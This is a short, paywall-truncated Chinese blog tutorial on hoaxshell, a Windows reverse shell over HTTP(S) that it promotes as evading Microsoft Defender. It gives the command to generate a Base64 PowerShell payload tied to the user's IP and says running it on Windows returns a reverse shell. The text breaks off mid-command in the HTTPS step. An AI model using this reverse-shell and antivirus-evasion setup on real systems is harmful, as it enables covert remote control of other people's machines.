超级会员免费看
本文介绍了如何使用hoaxshell工具创建未被AV检测到的Windows反向shell,该shell基于http(s)流量。内容涵盖通过http的基本shell会话以及通过https加密会话的操作步骤,包括如何生成和使用Base64加密的有效负载,以及如何生成证书进行https加密。
hoaxshell 是一种非常规的 Windows 反向 shell,目前未被 Microsoft Defender 和可能的其他 AV 解决方案检测到,因为它完全基于 http(s) 流量。该工具易于使用,它生成自己的 PowerShell 有效负载并支持加密 (ssl)。
1.通过 http 的基本 shell 会话
python3 hoaxshell.py -s <your_ip>
生成有效负载后,可以看到它已经使用Base64加密,我们直接去Windows运行即可,运行之后就会收到一个反向的shell连接。
2.通过https加密会话
首先生成证书,如下所示:
openssl req -x5
订阅专栏 解锁全文
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
